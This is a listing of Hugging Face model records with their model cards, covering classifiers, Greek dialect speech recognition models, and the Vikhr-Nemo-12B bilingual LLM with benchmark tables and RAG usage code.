This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
travelgate/testy_testy_room_environment-classifier | travelgate | 2024-10-10T08:21:35Z | 6 | 0 | null | [
"safetensors",
"distilbert",
"room",
"text-classification",
"multi-label",
"fine-tuned",
"en",
"base_model:dccuchile/distilbert-base-spanish-uncased",
"base_model:finetune:dccuchile/distilbert-base-spanish-uncased",
"region:us"
] | text-classification | 2024-10-09T14:17:33Z | ---
base_model: dccuchile/distilbert-base-spanish-uncased
language: en
model_name: environment classification
tags:
- room
- text-classification
- multi-label
- fine-tuned
---
# Evaluation Results
- F1 Score (Macro): 0.8889
- F1 Score (Micro): 0.9000
- Hamming Loss: 0.1818
- Accuracy: 0.6364
- Training Epochs: 1 |
mav23/Vikhr-Nemo-12B-Instruct-R-21-09-24-GGUF | mav23 | 2024-10-10T08:20:37Z | 99 | 4 | transformers | [
"transformers",
"gguf",
"en",
"ru",
"dataset:Vikhrmodels/GrandMaster-PRO-MAX",
"dataset:Vikhrmodels/Grounded-RAG-RU-v2",
"base_model:mistralai/Mistral-Nemo-Instruct-2407",
"base_model:quantized:mistralai/Mistral-Nemo-Instruct-2407",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T06:56:24Z | ---
license: apache-2.0
datasets:
- Vikhrmodels/GrandMaster-PRO-MAX
- Vikhrmodels/Grounded-RAG-RU-v2
language:
- en
- ru
base_model:
- mistralai/Mistral-Nemo-Instruct-2407
library_name: transformers
---
[Readme.md in English](Readme_en.md)
## Vikhr-Nemo-12B-Instruct-R-21-09-24
### Description
**Vikhr-Nemo** is our flagship unimodal LLM (Large Language Model), an improved version of [mistralai/Mistral-Nemo-Instruct-2407](https://huggingface.co/mistralai/Mistral-Nemo-Instruct-2407) built by the **VikhrModels** team and adapted primarily for Russian and English. Its training consisted of several stages, including **SFT** and **SMPO**, our own variation of DPO; see the section *"How this model was created"* for details.
The model is optimized for a wide range of use cases, including reasoning, summarization, code, roleplay, and dialogue. Vikhr-Nemo supports multilingual generation and offers high-performance RAG capabilities. It achieves the best scores among comparable models on our instruction-following and RAG benchmarks, so we believe that on some tasks (e.g., RAG) it can match OpenAI's gpt-4o-mini.
All training code is available in our [effective_llm_alignment](https://github.com/VikhrModels/effective_llm_alignment/) repository on GitHub, and the main datasets are available in our [HF profile](https://huggingface.co/Vikhrmodels).
### Features
1. High-quality generation in Russian and English, as well as some other languages, thanks to the [Grandmaster-PRO-MAX](https://huggingface.co/datasets/Vikhrmodels/GrandMaster-PRO-MAX) dataset and the base model
2. Support for system prompts to control the style of responses
3. Support for up to 128k context tokens thanks to the base model
4. Grounded RAG mode: the model has a dedicated documents role and a special mode of operation for finding the identifiers of documents relevant to the user's question and using them to answer it, inspired by the analogous capability of the Command-R model
### Metrics and quality evaluation
The model was evaluated on our Russian-language open-source side-by-side (SbS) benchmark [ru-arena-general](https://github.com/VikhrModels/ru_llm_arena) (50 topics with 10 questions each), where gpt-4-1106-preview acts as the judge, and on a [benchmark](https://colab.research.google.com/drive/16730rWQ4-yGqWoooLs0Ece_16frmOniP?usp=sharing) for RAG based on the test split of [Grounded-RAG-v2](https://huggingface.co/datasets/Vikhrmodels/Grounded-RAG-RU-v2), where gpt-4o acts as the judge.
#### Results on Ru-Arena-General
The reference answers that the models are compared against are the answers of gpt-3.5-turbo-0125, which is why it has a win rate of 50%.
Only part of the leaderboard is shown here; see the benchmark repository for details.
| Model Name | Winrate | 95% CI | Average # Tokens |
|--------------------------------------------------|--------|--------------------|------------------|
| gpt-4-1106-preview | 90.9 | (-1.3, 1.0) | 541 |
| gpt-4o-mini | 83.9 | (-1.8, 1.1) | 448 |
| **vikhr-nemo-12b-instruct-r-21-09-24** | **79.8** | (-2.2, 1.9) | **627** |
| gemma-2-9b-it-sppo-iter3 | 73.6 | (-1.6, 2.2) | 509 |
| gemma-2-9b-it | 69.2 | (-2.5, 1.9) | 459 |
| t-lite-instruct-0.1 | 64.7 | (-2.1, 1.7) | 810 |
| vikhr-llama3.1-8b-instruct-r-21-09-24 | 63.4 | (-2.1, 2.5) | 618 |
| suzume-llama-3-8B-multilingual-orpo-borda-half | 57.1 | (-1.9, 2.2) | 682 |
| mistral-nemo-instruct-2407 | 50.5 | (-2.7, 2.6) | 403 |
| gpt-3.5-turbo-0125 | 50.0 | (0.0, 0.0) | 220 |
| c4ai-command-r-v01 | 49.0 | (-1.7, 2.2) | 529 |
| meta-llama-3.1-8b-instruct | 43.1 | (-2.8, 2.3) | 628 |
#### Results on the RAG benchmark
The total size of the test set is 200 examples: 100 in_domain questions and 100 out_of_domain questions.
Here, the judge model gpt-4o was instructed to assess the relevance and factual completeness of the answers based on the documents and on the reference answer from gpt-4-1106-preview.
See the benchmark code on [Colab](https://colab.research.google.com/drive/16730rWQ4-yGqWoooLs0Ece_16frmOniP?usp=sharing) for the details of the prompts and scoring.
in_domain - questions that are related to the content of the provided documents to some degree \
out_of_domain - questions that are deliberately unrelated to the content of the provided documents
<table>
<thead>
<tr>
<th rowspan="2">question_type</th>
<th colspan="3">gpt-4o</th>
</tr>
<tr>
<th>judge_correct_percent</th>
<th>avg_answer_match_rougeL</th>
<th>avg_abs_indexes_diff</th>
</tr>
</thead>
<tbody>
<tr>
<td>in_domain</td>
<td>73%</td>
<td>0.34</td>
<td>NaN</td>
</tr>
<tr>
<td>out_of_domain</td>
<td>81%</td>
<td>0.20</td>
<td>NaN</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th style="visibility: hidden;" rowspan="2">question_type</th>
<th colspan="3">Vikhr-Nemo-12B-Instruct-R-21-09-24</th>
</tr>
<tr>
<th style="visibility: hidden;">judge_correct_percent</th>
<th style="visibility: hidden;">avg_answer_match_rougeL</th>
<th style="visibility: hidden;">avg_abs_indexes_diff</th>
</tr>
</thead>
<tbody>
<tr>
<td>in_domain</td>
<td>68%</td>
<td>0.41</td>
<td>0</td>
</tr>
<tr>
<td>out_of_domain</td>
<td>92%</td>
<td>0.52</td>
<td>0</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th style="visibility: hidden;" rowspan="2">question_type</th>
<th colspan="3">gpt-4o-mini</th>
</tr>
<tr>
<th style="visibility: hidden;">judge_correct_percent</th>
<th style="visibility: hidden;">avg_answer_match_rougeL</th>
<th style="visibility: hidden;">avg_abs_indexes_diff</th>
</tr>
</thead>
<tbody>
<tr>
<td>in_domain</td>
<td>65%</td>
<td>0.33</td>
<td>NaN</td>
</tr>
<tr>
<td>out_of_domain</td>
<td>73%</td>
<td>0.18</td>
<td>NaN</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th style="visibility: hidden;" rowspan="2">question_type</th>
<th colspan="3">gpt-3.5-turbo-0125 </th>
</tr>
<tr>
<th style="visibility: hidden;">judge_correct_percent</th>
<th style="visibility: hidden;">avg_answer_match_rougeL</th>
<th style="visibility: hidden;">avg_abs_indexes_diff</th>
</tr>
</thead>
<tbody>
<tr>
<td>in_domain</td>
<td>49%</td>
<td>0.28</td>
<td>NaN</td>
</tr>
<tr>
<td>out_of_domain</td>
<td>76%</td>
<td>0.20</td>
<td>NaN</td>
</tr>
</tbody>
</table>
### How this model was created
#### Instruction SFT stage
For the SFT training stage we prepared a large (150k instructions) synthetic instruction dataset, [Vikhrmodels/GrandMaster-PRO-MAX](https://huggingface.co/datasets/Vikhrmodels/GrandMaster-PRO-MAX). Its distinctive feature is built-in CoT (Chain-Of-Thought), collected using a modified prompt for gpt-4-turbo; see the dataset card for details.
In addition, to enable RAG grounding, we prepared another synthetic dataset, [Vikhrmodels/Grounded-RAG-RU-v2](https://huggingface.co/datasets/Vikhrmodels/Grounded-RAG-RU-v2) (50k dialogues); its construction pipeline is too complex to describe briefly, and you can read more about it in its dataset card.
#### Alignment stage with SMPO
To further improve the quality of responses, we used the following pipeline:
1) Trained a custom Reward model (it will not be released publicly for now)
2) Deduplicated and filtered the original Vikhrmodels/GrandMaster-PRO-MAX dataset using the RM model, obtaining around 10k of the highest-quality and most diverse dialogues.
3) Performed Rejection Sampling with the SFT checkpoint using the resulting dataset and the Reward model. (We generated 7 hypotheses and took only the 2 worst ones as rejected)
4) Further trained the SFT checkpoint with our SMPO method using the dataset obtained in step 3. SMPO was designed and chosen as the method to increase the stability of preference training under Rejection Sampling and to reach the desired margin.
The implementation of SMPO, rejection sampling, etc. can be found in our [effective_llm_alignment](https://github.com/VikhrModels/effective_llm_alignment/) library on GitHub
The idea of using SMPO rather than another PO method arose from a large number of experiments with classical methods, driven by the need for better control over the convergence process. With careful tuning of other methods (e.g., SimPO) a similar result can be achieved, but we tried to stabilize this process and combine the best practices from other methods.
### How to work with RAG
The documents role is a list of dictionaries describing the content of the documents, serialized with `json.dumps(array, ensure_ascii=False)` (see the example below). \
Document content can be provided in **3** different formats: **Markdown**, **HTML**, **Plain Text**. The content of each document can be a text chunk of up to 4k characters.
```json
[
{
"doc_id": (0..5),
"title": "(null or str)",
"content": "(html or markdown or plain text)"
}
]
```
#### Example of correct usage with an OpenAI-like API
Starting the vLLM server: `vllm serve --dtype half --max-model-len 32000 -tp 1 Vikhrmodels/Vikhr-Nemo-12B-Instruct-R-21-09-24 --api-key token-abc123`
```python
GROUNDED_SYSTEM_PROMPT = "Your task is to answer the user's questions using only the information from the provided documents. Give two answers to each question: one with a list of relevant document identifiers and the second with the answer to the question itself, using documents with these identifiers."
documents = [
{
"doc_id": 0,
"title": "Глобальное потепление: ледники",
"content": "За последние 50 лет объем ледников в мире уменьшился на 30%"
},
{
"doc_id": 1,
"title": "Глобальное потепление: Уровень моря",
"content": "Уровень мирового океана повысился на 20 см с 1880 года и продолжает расти на 3,3 мм в год"
}
]
sample_history = [
{'role': 'system', 'content': GROUNDED_SYSTEM_PROMPT},
{'role': 'documents', 'content': json.dumps(documents, ensure_ascii=False)},
{'role': 'user', 'content': 'Глоабльное потепление'}
]
relevant_indexes = llm_client.chat.completions.create(
model=llm_model,
messages=sample_history,
temperature=0.0,
max_tokens=2048
).choices[0].message.content
print('Using documents: ' + relevant_indexes + '\n----')
final_answer = llm_client.chat.completions.create(
model=llm_model,
messages=sample_history + [{'role': 'assistant', 'content': relevant_indexes}],
temperature=0.3,
max_tokens=2048
).choices[0].message.content
print(final_answer)
```
After running the code, the answer will look roughly like this:
Using documents: {"relevant_doc_ids": [0, 1]}
----
Глобальное потепление – это долгосрочное повышение средней температуры атмосферы и океанов Земли. Это явление имеет множество последствий для нашей планеты, и среди них можно выделить два ключевых аспекта, основанных на доступных мне данных:
1. **Уменьшение объема ледников**: За последние 50 лет наблюдается значительное сокращение объема ледников по всему миру. Согласно данным, объем ледников уменьшился на 30%. Это может быть связано с таянием ледников из-за повышения температур, что является одним из признаков глобального потепления.
2. **Повышение уровня моря**: Уровень мирового океана также увеличивается, что связано с таянием ледников и ледяных покровов, а также с расширением воды при повышении температуры. С 1880 года уровень моря повысился на 20 сантиметров, и этот процесс продолжается, с ежегодным увеличением на 3,3 миллиметра.
Эти изменения имеют серьезные последствия для экосистем, климата и человеческого общества. Таяние ледников приводит к повышению уровня моря, что может привести к затоплению прибрежных территорий и островов, а также к изменению водных ресурсов и климатических паттернов.
Using the model's first response `relevant_indexes` (JSON), you can tell whether the model found relevant information in the documents or not; it is trained to return an empty array if there is none, and in that case it will respond (when generating the second answer) that it could not find the information in the knowledge base.
### Nuances and limitations
- The model has a **low level of answer safety** and is aimed at correctly and fully following instructions; keep this in mind when using it and test it yourself. This can be partially remedied with system prompts and additional instructions about the importance of safety in the user prompt.
- System prompts are not intended for describing characters; we recommend using them to specify the response style (e.g. "answer only in json format"). In addition, it is preferable to write them **in English**, as was the case in the dataset; using English in system prompts does not affect the language of the response.
- The RAG mode **requires** the `GROUNDED_SYSTEM_PROMPT` system prompt described in the *How to work with RAG* section. Also, the model may sometimes add general information from its own knowledge to the answer in addition to what is in the documents.
- The model is best used with a low temperature (0.1-0.5) and with top_k (30-50); at temperature 1.0 occasional generation defects were observed.
### Authors
- Sergei Bratchikov, [NLP Wanderer](https://t.me/nlpwanderer), Vikhr Team
- Konstantin Korolev, Vikhr Team
- Aleksandr Nikolich, Vikhr Team |
abdelnour131/wav2vec2-base-one-shot-hip-hop-drums-clf-finetuned-gtzan | abdelnour131 | 2024-10-10T08:15:52Z | 164 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"wav2vec2",
"audio-classification",
"generated_from_trainer",
"dataset:marsyas/gtzan",
"base_model:yojul/wav2vec2-base-one-shot-hip-hop-drums-clf",
"base_model:finetune:yojul/wav2vec2-base-one-shot-hip-hop-drums-clf",
"license:apache-2.0",
"model-index",
"endpoints_compatible",
"region:us"
] | audio-classification | 2024-10-09T17:37:45Z | ---
library_name: transformers
license: apache-2.0
base_model: yojul/wav2vec2-base-one-shot-hip-hop-drums-clf
tags:
- generated_from_trainer
datasets:
- marsyas/gtzan
metrics:
- accuracy
model-index:
- name: wav2vec2-base-one-shot-hip-hop-drums-clf-finetuned-gtzan
results:
- task:
name: Audio Classification
type: audio-classification
dataset:
name: GTZAN
type: marsyas/gtzan
config: all
split: train
args: all
metrics:
- name: Accuracy
type: accuracy
value: 0.74
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# wav2vec2-base-one-shot-hip-hop-drums-clf-finetuned-gtzan
This model is a fine-tuned version of [yojul/wav2vec2-base-one-shot-hip-hop-drums-clf](https://huggingface.co/yojul/wav2vec2-base-one-shot-hip-hop-drums-clf) on the GTZAN dataset.
It achieves the following results on the evaluation set:
- Loss: 0.9288
- Accuracy: 0.74
## Model description
More information needed
## Intended uses & limitations
More information needed
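As a sketch of intended use, the checkpoint can be tried for music-genre classification with the audio-classification pipeline (the audio path below is a placeholder):
```python
from transformers import pipeline

genre_classifier = pipeline(
    "audio-classification",
    model="abdelnour131/wav2vec2-base-one-shot-hip-hop-drums-clf-finetuned-gtzan",
)
# returns genre labels with scores for an audio clip (resampled internally when given a file path)
print(genre_classifier("example_clip.wav"))
```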
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 8
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 5
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 1.7695 | 1.0 | 100 | 1.9632 | 0.345 |
| 1.3851 | 2.0 | 200 | 1.3526 | 0.56 |
| 1.0214 | 3.0 | 300 | 1.3209 | 0.58 |
| 0.725 | 4.0 | 400 | 1.0294 | 0.72 |
| 0.6425 | 5.0 | 500 | 0.9288 | 0.74 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
ilsp/xls-r-greek-aivaliot | ilsp | 2024-10-10T08:09:59Z | 79 | 1 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"Aivaliot",
"Greek dialect",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-08-08T13:23:42Z | ---
metrics:
- wer
- cer
library_name: transformers
pipeline_tag: automatic-speech-recognition
tags:
- Aivaliot
- Greek dialect
---
# xls-r-greek-aivaliot
Aivaliot is a variety of Greek that was spoken in Aivali (known as Ayvalık in Turkish),
located on the Edremit Gulf in Western Turkey, till the beginning of the 20th century.
After the end of the war between Greece and Turkey (1919–1922) and the defeat of the Greek army,
those Aivaliots who managed to survive flew to Greece, principally to the nearby island of Lesbos,
where they settled in various dialectal enclaves. Aivaliot resembles Lesbian in many respects.
According to Ralli (Ralli, 2019), Aivaliot and Lesbian belong to the group of Northern Greek Dialects,
sharing unstressed /i/ and /u/ deletion and unstressed /o/ and /e/ raising.
Aivaliot morphology and the lexicon are influenced by Turkish, because of a long domination
by the Ottomans, as well as by Italo-Romance, due to the pre-Ottoman Genovese rule and trade with Venice (Ralli, 2019b).
However, there are no Turkish or Italo-Romance influences on phonology or syntax.
In 2002, a handful of first-generation Aivaliot speakers could still be found in Lesbos and
elsewhere in Greece and abroad, where they still remembered and practiced their mother tongue (Ralli, 2019).
Nowadays, the dialect is on the way to extinction, since second-generation speakers either have
a passive knowledge of it, or those living in Lesbos mix their own dialectal variety with the parent Lesbian.
This is the first automatic speech recognition (ASR) model for Aivaliot.
To train the model, we fine-tuned a Greek XLS-R model ([jonatasgrosman/wav2vec2-large-xlsr-53-greek](https://huggingface.co/jonatasgrosman/wav2vec2-large-xlsr-53-greek)) on the Aivaliot resources.
## Resources
We used recordings from the Asia Minor Archive (AMiGre) to train the model. AMiGre was compiled within the
framework of two research projects that ran in the periods 2002-2005 and 2012-2016.
We obtained permission to use it from the studies’ authors. It consists of narratives elicited from
18 elderly speakers (5 male, 13 female), all refugees from Aivali, who had settled in different villages
of the island of Lesbos. The data collection was carried out in 2002-2003, after obtaining a written
consent of the informants, as well as the approval of the Ethics committee of the University of Patras.
The corpus has a total duration of almost 14 hours. It has been transcribed and annotated by
two native speakers of the dialect, using a transcription system based on the Greek alphabet
and orthography, which is adapted according to SAMPA. The annotations include metadata information,
such as the source of the data, the identity and background of the informants, and the conditions of
the data collection. The corpus is stored on the server of the Laboratory of Modern Greek Dialects of
the University of Patras and is [freely accessible online](http://amigredb.philology.upatras.gr)
To prepare the dataset, the texts were normalized (see [greek_dialects_asr/](https://gitlab.com/ilsp-spmd-all/speech/greek_dialects_asr/) for scripts),
and all audio files were converted into a 16 kHz mono format.
We split the Praat annotations into audio-transcription segments, which resulted in a dataset of a total duration of 10h 14m 44s.
Note that the removal of music, long pauses, and non-transcribed segments leads to a reduction of the total audio duration (compared to the initial 14h recordings).
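The 16 kHz mono conversion mentioned above can be reproduced with torchaudio; a minimal sketch (file names are placeholders, not the project's actual scripts):
```python
import torchaudio
import torchaudio.functional as F

waveform, sample_rate = torchaudio.load("recording_in.wav")
# downmix to mono and resample to the 16 kHz rate expected by XLS-R
waveform = waveform.mean(dim=0, keepdim=True)
waveform = F.resample(waveform, orig_freq=sample_rate, new_freq=16000)
torchaudio.save("recording_16k_mono.wav", waveform, 16000)
```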
## Metrics
We evaluated the model on the test set split, which consists of 10% of the dataset recordings.
|Model|CER|WER|
|---|---|---|
|pre-trained|104.80%|113.67%|
|fine-tuned|39.55%|73.83%|
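For inference, the fine-tuned checkpoint can be used through the standard transformers ASR pipeline; a minimal sketch (the audio path is a placeholder, and the input should be 16 kHz mono audio):
```python
from transformers import pipeline

asr = pipeline(
    "automatic-speech-recognition",
    model="ilsp/xls-r-greek-aivaliot",
)
# expects 16 kHz mono audio, matching the training data
print(asr("aivaliot_sample.wav")["text"])
```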
## Training hyperparameters
We fine-tuned the baseline model (`wav2vec2-large-xlsr-53-greek`) on an NVIDIA GeForce RTX 3090, using the following hyperparameters:
| arg | value |
|-------------------------------|-------|
| `per_device_train_batch_size` | 8 |
| `gradient_accumulation_steps` | 2 |
| `num_train_epochs` | 35 |
| `learning_rate` | 3e-4 |
| `warmup_steps` | 500 |
## Citation
To cite this work or read more about the training pipeline, see:
S. Vakirtzian, C. Tsoukala, S. Bompolas, K. Mouzou, V. Stamou, G. Paraskevopoulos, A. Dimakis, S. Markantonatou, A. Ralli, A. Anastasopoulos, Speech Recognition for Greek Dialects: A Challenging Benchmark, Proceedings of the Annual Conference of the International Speech Communication Association (INTERSPEECH), 2024. |
ilsp/xls-r-greek-cretan | ilsp | 2024-10-10T08:07:44Z | 79 | 0 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"Cretan",
"Greek dialect",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-08-08T14:23:05Z | ---
metrics:
- wer
- cer
library_name: transformers
pipeline_tag: automatic-speech-recognition
tags:
- Cretan
- Greek dialect
---
# Cretan XLS-R model
Cretan is a variety of Modern Greek predominantly used by speakers who reside on the island of Crete or
belong to the Cretan diaspora. This includes communities of Cretan origin that were relocated to the
village of Hamidieh in Syria and to Western Asia Minor, following the population exchange between
Greece and Turkey in 1923. The historical and geographical factors that have shaped the development
and preservation of the dialect include the long-term isolation of Crete from the mainland, and the
successive domination of the island by foreign powers, such as the Arabs, the Venetians, and the Turks,
over a period of seven centuries. Cretan has been divided based on its phonological, phonetic,
morphological, and lexical characteristics into two major dialect groups: the western and the eastern.
The boundary between these groups coincides with the administrative division of the island into the
prefectures of Rethymno and Heraklion. Kontosopoulos (2008) argues that the eastern dialect group is more
homogeneous than the western one, which shows more variation across all levels of linguistic analysis.
Contrary to other Modern Greek Dialects, Cretan does not face the threat of extinction, as it remains
the sole means of communication for a large number of speakers in various parts of the island.
This is the first automatic speech recognition (ASR) model for Cretan.
To train the model, we fine-tuned a Greek XLS-R model ([jonatasgrosman/wav2vec2-large-xlsr-53-greek](https://huggingface.co/jonatasgrosman/wav2vec2-large-xlsr-53-greek)) on the Cretan resources (see below).
## Resources
For the compilation of the Cretan corpus, we gathered 32 tapes containing material from
radio broadcasts in digital format, with permission from the Audiovisual Department of the
Vikelaia Municipal Library of Heraklion, Crete. These broadcasts were recorded and
aired by Radio Mires, in the Messara region of Heraklion, during the period 1998-2001,
totaling 958 minutes and 47 seconds. These recordings primarily consist of narratives
by one speaker, Ioannis Anagnostakis, who is responsible for their composition. In terms
of textual genre, the linguistic content of the broadcasts consists of folklore
narratives expressed in the local linguistic variety. Out of the total volume of material
collected, we utilized nine tapes. Criteria for material selection included, on the one hand,
maximizing digital clarity of speech and, on the other hand, ensuring representative sampling
across the entire three-year period of radio recordings. To obtain an initial transcription,
we employed the Large-v2 model, which was the largest Whisper model at the time. Subsequently,
the transcripts were manually corrected in collaboration with the local community.
The transcription system that was used was based on the Greek alphabet and orthography
and it was annotated in Praat.
To prepare the dataset, the texts were normalized (see [greek_dialects_asr/](https://gitlab.com/ilsp-spmd-all/speech/greek_dialects_asr/) for scripts),
and all audio files were converted into a 16 kHz mono format.
We split the Praat annotations into audio-transcription segments, which resulted in a dataset of a total duration of 1h 21m 12s.
Note that the removal of music, long pauses, and non-transcribed segments leads to a reduction of the total audio duration
(compared to the initial 2h recordings of the 9 tapes).
## Metrics
We evaluated the model on the test set split, which consists of 10% of the dataset recordings.
|Model|WER|CER|
|---|---|---|
|pre-trained|104.83%|91.73%|
|fine-tuned|28.27%|7.88%|
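The WER and CER scores above are standard edit-distance metrics; a minimal sketch of how such scores can be computed with the jiwer library (the example strings are illustrative, not taken from the test set):
```python
import jiwer

references = ["ίντα κάνεις σήμερο"]   # ground-truth transcription (illustrative)
hypotheses = ["ίντα κάνει σήμερο"]    # model output (illustrative)

print("WER:", jiwer.wer(references, hypotheses))
print("CER:", jiwer.cer(references, hypotheses))
```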
## Training hyperparameters
We fine-tuned the baseline model (`wav2vec2-large-xlsr-53-greek`) on an NVIDIA GeForce RTX 3090, using the following hyperparameters:
| arg | value |
|-------------------------------|-------|
| `per_device_train_batch_size` | 8 |
| `gradient_accumulation_steps` | 2 |
| `num_train_epochs` | 35 |
| `learning_rate` | 3e-4 |
| `warmup_steps` | 500 |
## Citation
To cite this work or read more about the training pipeline, see:
S. Vakirtzian, C. Tsoukala, S. Bompolas, K. Mouzou, V. Stamou, G. Paraskevopoulos, A. Dimakis, S. Markantonatou, A. Ralli, A. Anastasopoulos, Speech Recognition for Greek Dialects: A Challenging Benchmark, Proceedings of the Annual Conference of the International Speech Communication Association (INTERSPEECH), 2024. |
iarchitarora/gemma-medical_qa-Finetune | iarchitarora | 2024-10-10T08:05:42Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"gemma",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T08:00:52Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Mund86/edsface | Mund86 | 2024-10-10T08:04:49Z | 5 | 0 | null | [
"license:other",
"region:us"
] | null | 2024-10-10T07:01:34Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
--- |
borno1/WSDD-continual | borno1 | 2024-10-10T08:04:06Z | 29 | 0 | diffusers | [
"diffusers",
"safetensors",
"text-to-image",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | 2024-10-10T08:02:23Z | ---
license: creativeml-openrail-m
tags:
- text-to-image
---
### Tecaher_sdv1.5_epochs_5000 on Stable Diffusion via Dreambooth
#### model by borno1
This your the Stable Diffusion model fine-tuned the Tecaher_sdv1.5_epochs_5000 concept taught to Stable Diffusion with Dreambooth.
It can be used by modifying the `instance_prompt`: **flower**
You can also train your own concepts and upload them to the library by using [this notebook](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/sd_dreambooth_training.ipynb).
And you can run your new concept via `diffusers`: [Colab Notebook for Inference](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/sd_dreambooth_inference.ipynb), [Spaces with the Public Concepts loaded](https://huggingface.co/spaces/sd-dreambooth-library/stable-diffusion-dreambooth-concepts)
Here are the images used for training this concept:
|
rytsar/finetuning-spam-model-5000-samples | rytsar | 2024-10-10T07:59:41Z | 105 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-10-10T07:52:28Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
- f1
model-index:
- name: finetuning-spam-model-5000-samples
results: []
---
